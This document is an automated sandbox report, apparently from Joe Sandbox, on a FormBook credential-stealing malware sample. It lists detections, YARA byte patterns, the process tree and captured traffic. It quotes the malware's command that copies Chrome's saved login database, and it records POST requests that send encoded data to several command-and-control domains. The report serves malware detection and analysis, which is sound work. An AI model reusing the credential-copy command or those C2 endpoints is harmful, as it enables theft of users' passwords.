
Analysis Report RFQ.exe.vir

Overview

General Information

Sample Name: RFQ.exe.vir (renamed file extension from vir to exe)
MD5: 22dc43ed0fab2aca044494cefd0fa2c7
SHA1: e47f39003136287190b347f784122110a12700ed
SHA256: faebab8e94693d16273dfd699a3d5067a241b3d544de0a47dd52008ae782c18d

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google Chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Injects a PE file into a foreign process
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc.)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString, GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number, etc.) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file name differs from the original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • RFQ.exe.exe (PID: 4996 cmdline: 'C:\Users\user\Desktop\RFQ.exe.exe' MD5: 22DC43ED0FAB2ACA044494CEFD0FA2C7)
    • RFQ.exe.exe (PID: 5408 cmdline: C:\Users\user\Desktop\RFQ.exe.exe MD5: 22DC43ED0FAB2ACA044494CEFD0FA2C7)
    • RFQ.exe.exe (PID: 4068 cmdline: C:\Users\user\Desktop\RFQ.exe.exe MD5: 22DC43ED0FAB2ACA044494CEFD0FA2C7)
    • RFQ.exe.exe (PID: 2300 cmdline: C:\Users\user\Desktop\RFQ.exe.exe MD5: 22DC43ED0FAB2ACA044494CEFD0FA2C7)
      • explorer.exe (PID: 2928 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
        • cmd.exe (PID: 5640 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cmd.exe (PID: 5872 cmdline: /c del 'C:\Users\user\Desktop\RFQ.exe.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5452 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • ebplgh1bmx.exe (PID: 2464 cmdline: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe MD5: 22DC43ED0FAB2ACA044494CEFD0FA2C7)
          • ebplgh1bmx.exe (PID: 5728 cmdline: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe MD5: 22DC43ED0FAB2ACA044494CEFD0FA2C7)
        • cmmon32.exe (PID: 2644 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000001E.00000002.1280450173.0000000002550000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000001E.00000002.1280450173.0000000002550000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18429:$sqlite3step: 68 34 1C 7B E1
  • 0x1853c:$sqlite3step: 68 34 1C 7B E1
  • 0x18458:$sqlite3text: 68 38 2A 90 C5
  • 0x1857d:$sqlite3text: 68 38 2A 90 C5
  • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
0000001E.00000002.1280450173.0000000002550000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001D.00000002.1277991458.0000000000DD0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000001D.00000002.1277991458.0000000000DD0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18429:$sqlite3step: 68 34 1C 7B E1
  • 0x1853c:$sqlite3step: 68 34 1C 7B E1
  • 0x18458:$sqlite3text: 68 38 2A 90 C5
  • 0x1857d:$sqlite3text: 68 38 2A 90 C5
  • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18593:$sqlite3blob: 68 53 D8 7F 8C

Unpacked PEs

Source | Rule | Description | Author | Strings
29.2.ebplgh1bmx.exe.400000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
29.2.ebplgh1bmx.exe.400000.1.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17629:$sqlite3step: 68 34 1C 7B E1
  • 0x1773c:$sqlite3step: 68 34 1C 7B E1
  • 0x17658:$sqlite3text: 68 38 2A 90 C5
  • 0x1777d:$sqlite3text: 68 38 2A 90 C5
  • 0x1766b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17793:$sqlite3blob: 68 53 D8 7F 8C
29.2.ebplgh1bmx.exe.400000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x149a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14491:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14aa7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14c1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x989a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1370c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa593:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19d17:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ad1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
8.2.RFQ.exe.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
8.2.RFQ.exe.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17629:$sqlite3step: 68 34 1C 7B E1
  • 0x1773c:$sqlite3step: 68 34 1C 7B E1
  • 0x17658:$sqlite3text: 68 38 2A 90 C5
  • 0x1777d:$sqlite3text: 68 38 2A 90 C5
  • 0x1766b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17793:$sqlite3blob: 68 53 D8 7F 8C

Sigma Overview

System Summary:

Sigma detected: Steal Google Chrome login data
Source: Process started | Author: Joe Security
Data:
  • Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
  • CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
  • CommandLine|base64offset|contains:
  • Image: C:\Windows\SysWOW64\cmd.exe
  • NewProcessName: C:\Windows\SysWOW64\cmd.exe
  • OriginalFileName: C:\Windows\SysWOW64\cmd.exe
  • ParentCommandLine: C:\Windows\SysWOW64\cmd.exe
  • ParentImage: C:\Windows\SysWOW64\cmd.exe
  • ParentProcessId: 5640
  • ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
  • ProcessId: 5452

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: RFQ.exe.exe | Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Wajuduf\ebplgh1bmx.exe | Avira: detection malicious, Label: HEUR/AGEN.1046691
Multi AV Scanner detection for domain / URL
Source: http://www.artiyonq.com/m8l/ | Virustotal: Detection: 6%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Wajuduf\ebplgh1bmx.exe | Virustotal: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\Wajuduf\ebplgh1bmx.exe | ReversingLabs: Detection: 62%
Multi AV Scanner detection for submitted file
Source: RFQ.exe.exe | Virustotal: Detection: 68%
Source: RFQ.exe.exe | ReversingLabs: Detection: 62%
Yara detected FormBook
Source: Yara match | File source: 0000001E.00000002.1280450173.0000000002550000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.1277991458.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.1278238054.0000000001400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.881220627.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.882704990.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.1277745187.0000000000401000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.880507060.0000000000401000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 29.2.ebplgh1bmx.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.RFQ.exe.exe.400000.0.unpack, type: UNPACKEDPE
Source: 29.2.ebplgh1bmx.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.2.RFQ.exe.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E360DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose | 6_2_00E360DD
Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E363F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose | 6_2_00E363F9
Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E3EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose | 6_2_00E3EB60
Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E36CA9 GetFileAttributesW,FindFirstFileW,FindClose | 6_2_00E36CA9
Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E3F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf | 6_2_00E3F5FA
Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E3F56F FindFirstFileW,FindClose | 6_2_00E3F56F
Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E41B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 6_2_00E41B2F
Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E41C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 6_2_00E41C8A
Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 6_2_00E41F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose | 6_2_00E41F94

Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 4x nop then pop ebx | 8_2_00407AC5
Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 4x nop then pop esi | 8_2_00417373
Source: C:\Users\user\Desktop\RFQ.exe.exe | Code function: 4x nop then pop edi | 8_2_00416D3D
Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 4x nop then pop ebx | 29_2_00407AC5
Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 4x nop then pop esi | 29_2_00417373
Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exe | Code function: 4x nop then pop edi | 29_2_00416D3D
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4x nop then pop esi | 30_2_02567373
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 4x nop then pop edi | 30_2_02566D3D

Source: global traffic | HTTP traffic detected: GET /m8l/?tVT=stAPCawU9FsBsDeLDlqawFgIxU41y6VpxlOSmtpgZq2QqlgInUNCOlYAlNLBb+BUECvq&MR-p=0tPLH85x-lH HTTP/1.1 | Host: www.kmwhbl.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /m8l/?tVT=lki1ed3GPMN5Nw1jaHFlS3B9RQB9zvXEK7YHw36ZfVLkkOoQWGs0VMlLDODNdBIBI6zD&MR-p=0tPLH85x-lH HTTP/1.1 | Host: www.addis.tech | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /m8l/?MR-p=0tPLH85x-lH&tVT=ovbFtOa4uTjd1a92oYI1beIGZw7s4qusWsZU0rgv2nLP+ugoFD+dLAFKen/jDfcukVqZ HTTP/1.1 | Host: www.nusaliterainspirasi.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /m8l/?MR-p=0tPLH85x-lH&tVT=PZkH6llHoqFvvgYvV7p0jyJ4zE2wugCWkpTMu12MC83jrlv2PlfP15O4FxttxOVUzuUw HTTP/1.1 | Host: www.teccommunications.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /m8l/?tVT=HCt+Yhx/h4l+FCj3nKRKOvS7Xa1e0tc/Egfr+bgHKkeQjLAOt82B/JBt+eO2F9D4/3gd&MR-p=0tPLH85x-lH HTTP/1.1 | Host: www.obsoletelabs.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /m8l/?tVT=5W/5kEIdtxVt3n/xoeTRd2P1yDG4A43nFAD006cGMUhROXoTda6GZj7hA5S0bqxvW5XG&MR-p=0tPLH85x-lH HTTP/1.1 | Host: www.artiyonq.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /m8l/?MR-p=0tPLH85x-lH&tVT=dcH6q++BfneLHwYr+7wkAtOqeHmKUMZpIhb6VvBnwf4Bd/1QFFGV2dHI+mdn934ofCRD HTTP/1.1 | Host: www.tgers.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 52.58.78.16
Source: Joe Sandbox View | ASN Name: unknown
Source: global traffic | HTTP traffic detected: POST /m8l/ HTTP/1.1 | Host: www.addis.tech | Connection: close | Content-Length: 409 | Cache-Control: no-cache | Origin: http://www.addis.tech | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.addis.tech/m8l/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST /m8l/ HTTP/1.1 | Host: www.nusaliterainspirasi.com | Connection: close | Content-Length: 409 | Cache-Control: no-cache | Origin: http://www.nusaliterainspirasi.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.nusaliterainspirasi.com/m8l/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST /m8l/ HTTP/1.1 | Host: www.nusaliterainspirasi.com | Connection: close | Content-Length: 142745 | Cache-Control: no-cache | Origin: http://www.nusaliterainspirasi.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.nusaliterainspirasi.com/m8l/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST /m8l/ HTTP/1.1 | Host: www.teccommunications.com | Connection: close | Content-Length: 409 | Cache-Control: no-cache | Origin: http://www.teccommunications.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.teccommunications.com/m8l/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST /m8l/ HTTP/1.1 | Host: www.teccommunications.com | Connection: close | Content-Length: 142745 | Cache-Control: no-cache | Origin: http://www.teccommunications.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.teccommunications.com/m8l/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST /m8l/ HTTP/1.1 | Host: www.obsoletelabs.com | Connection: close | Content-Length: 409 | Cache-Control: no-cache | Origin: http://www.obsoletelabs.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.obsoletelabs.com/m8l/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST /m8l/ HTTP/1.1 | Host: www.obsoletelabs.com | Connection: close | Content-Length: 142745 | Cache-Control: no-cache | Origin: http://www.obsoletelabs.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.obsoletelabs.com/m8l/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
34 33 74 77 6b 45 34 6d 39 56 70 71 37 6f 52 78 6d 64 32 4f 6a 4c 74 6a 49 53 38 5a 28 37 56 41 30 38 32 4d 51 61 59 4f 56 39 54 38 4f 6b 77 52 65 2d 35 35 36 38 30 35 56 77 53 30 55 38 63 6b 37 7a 30 45 38 6a 78 53 67 4c 58 41 35 31 57 32 43 63 74 75 7a 6d 62 73 78 73 39 65 79 66 70 38 65 61 52 52 52 6f 51 6f 76 79 75 45 61 6d 72 79 79 4f 77 57 65 2d 69 35 78 35 4c 5f 65 69 58 6f 69 69 6b 62 66 55 68 2d 42 4a 37 34 41 6e 68 4b 4b 61 6b 4d 6e 69 44 66 4e 70 77 73 7a 4c 69 34 77 67 30 38 30 39 44 65 78 35 6a 43 65 67 32 68 4e 68 53 72 32 45 73 45 70 50 79 67 28 59 4d 2d 79 78 6c 33 28 5a 69 2d 66 5a 5a 35 36 38 6f 4e 54 73 71 65 37 4a 73 69 54 61 78 76 4a 59 39 75 53 32 33 32 57 59 71 75 69 31 61 6d 7a 47 58 5f 66 66 58 76 38 73 4f 4b 43 48 68 4b 4e 50 33 66 46 35 37 65 34 71 6f 4a 34 62 7a 34 38 58 30 33 56 70 67 4c 41 61 72 4a 44 42 54 5f 49 6c 66 4e 7e 50 62 41 64 32 48 38 53 54 47 77 53 30 7e 48 41 75 69 59 32 5f 4f 46 58 4a 67 61 39 76 75 72 50 4e 47 48 67 43 4a 6e 49 6e 53 42 38 34 6a 49 72 76 74 70 46 4b 41 6e 7
          Source: global trafficHTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.artiyonq.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.artiyonq.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.artiyonq.com/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 78 30 7a 44 36 67 70 4d 76 52 56 6c 6e 31 28 65 31 35 4f 49 42 57 7a 4f 6b 79 61 33 47 4c 6e 41 5a 6c 6a 32 6d 6f 55 2d 4f 32 4a 42 41 33 59 76 55 4c 48 68 62 44 44 67 61 36 6e 4f 65 5f 64 6b 4f 71 61 39 32 39 59 54 48 76 62 6b 71 6f 58 79 42 62 43 68 64 46 34 43 71 4e 7e 6b 78 58 49 48 7e 78 57 73 75 39 79 49 72 78 4c 4e 57 67 68 65 65 6c 68 76 72 7a 45 54 6c 58 74 34 73 2d 36 4a 51 50 52 4b 49 43 75 32 79 67 42 6d 4c 5f 44 31 50 50 54 6d 4c 78 6b 79 6f 75 6b 50 50 65 65 49 36 6e 4b 79 64 4d 34 4b 69 56 34 73 44 66 6e 57 4d 57 30 36 42 72 62 72 7e 71 57 2d 47 56 6e 4c 78 6a 69 67 4b 68 4d 37 6f 57 68 4f 7a 6d 41 42 6e 6c 6e 72 58 45 63 34 67 65 4c 46 68 37 4f 4f 55 41 76 6f 38 65 69 6b 66 66 63 72 50 79 76 69 41 41 42 4f 30 45 34 73 4a 6e 66 65 54 36 72 36 5a 41 5a 36 69 44 49 79 44 54 64 53 6d 71 39 4d 70 72 6d 37 39 49 6d 61 44 66 4a 54 4a 46 4b 59 63 71 4c 56 72 33 54 70 73 54 45 2d 74 59 38 43 32 68 55 39 76 4e 44 36 6b 4e 42 6d 77 4f 52 6c 6c 79 7e 74 79 35 74 77 58 55 76 44 4b 6b 57 6d 39 59 44 6b 72 44 52 32 4c 72 6c 30 41 69 6b 36 39 4a 50 31 34 65 4a 32 75 63 6f 45 6f 4f 68 6f 4a 30 66 41 62 71 76 37 30 36 5a 5f 77 54 4f 36 76 70 73 36 6d 6b 63 6c 4b 70 71 74 51 4e 69 5a 75 77 29 2e 00 62 6a 48 57 35 47 30 Data Ascii: 
tVT=x0zD6gpMvRVln1(e15OIBWzOkya3GLnAZlj2moU-O2JBA3YvULHhbDDga6nOe_dkOqa929YTHvbkqoXyBbChdF4CqN~kxXIH~xWsu9yIrxLNWgheelhvrzETlXt4s-6JQPRKICu2ygBmL_D1PPTmLxkyoukPPeeI6nKydM4KiV4sDfnWMW06Brbr~qW-GVnLxjigKhM7oWhOzmABnlnrXEc4geLFh7OOUAvo8eikffcrPyviAABO0E4sJnfeT6r6ZAZ6iDIyDTdSmq9Mprm79ImaDfJTJFKYcqLVr3TpsTE-tY8C2hU9vND6kNBmwORlly~ty5twXUvDKkWm9YDkrDR2Lrl0Aik69JP14eJ2ucoEoOhoJ0fAbqv706Z_wTO6vps6mkclKpqtQNiZuw).bjHW5G0
          Source: global trafficHTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.artiyonq.comConnection: closeContent-Length: 142745Cache-Control: no-cacheOrigin: http://www.artiyonq.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.artiyonq.com/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 78 30 7a 44 36 6b 31 79 70 77 45 35 6a 41 54 57 6b 36 69 70 4d 6d 72 4d 69 53 65 7a 50 38 4c 36 51 56 4f 70 6d 70 45 36 45 6b 78 70 4b 33 45 76 53 4a 28 69 57 44 44 68 63 36 6e 4e 61 5f 5a 63 48 59 71 31 32 38 64 49 48 76 44 72 6a 4f 72 33 47 4c 43 4d 62 6b 46 78 6a 70 57 5f 78 53 49 59 7e 55 48 5f 6c 74 7e 49 6d 68 54 50 54 42 77 4d 5a 68 78 77 6d 69 6f 61 32 47 55 38 72 49 7a 30 52 70 5a 6f 5a 47 6d 34 33 57 41 6f 4f 38 72 64 59 6f 33 35 42 42 77 35 32 35 73 51 53 74 37 44 37 69 7e 51 42 35 4d 4e 7e 31 78 38 49 34 61 6c 4b 69 73 74 48 34 44 56 7e 73 57 49 63 54 50 67 31 68 47 6f 47 77 78 75 6a 48 31 4d 28 30 6f 4a 77 51 54 61 52 46 4e 69 38 75 37 56 32 62 54 55 59 6d 71 31 68 72 43 66 64 4b 73 64 48 69 66 57 4e 33 5a 57 39 6e 67 54 4f 67 69 63 64 4c 4c 69 61 43 31 4d 28 7a 4a 55 46 54 64 6b 74 49 30 73 34 35 4b 77 7a 35 57 34 48 59 74 4b 4f 52 28 71 66 6f 28 5a 6c 7a 7a 71 71 6a 73 69 34 5f 77 2d 38 69 34 79 28 66 66 5a 73 74 42 31 72 38 35 73 6c 79 7e 4c 79 34 74 65 57 6b 4c 44 4c 77 43 50 39 37 37 77 28 7a 52 5f 4a 62 31 79 5a 69 6f 55 39 4e 72 31 35 73 52 63 76 76 49 45 69 5f 78 72 4a 57 6e 41 64 61 76 37 39 61 59 39 31 7a 37 72 74 4f 38 67 74 46 4e 79 44 73 57 2d 52 64 44 7a 7e 77 64 61 43 5f 7e 79 37 43 4e 51 59 41 53 56 4b 50 7e 4f 32 48 48 6b 51 67 65 61 6c 2d 32 61 72 70 35 75 44 39 35 4a 39 52 53 70 68 56 4f 4a 54 52 4a 52 66 43 64 58 39 66 32 78 5a 35 45 6a 32 65 43 74 59 41 6d 39 50 67 48 4a 4c 71 46 54 39 4e 6e 38 55 4a 6c 67 6a 37 67 68 7e 34 67 52 75 75 42 45 46 6b 33 63 6e 66 51 34 38 31 35 56 49 78 54 44 37 4f 
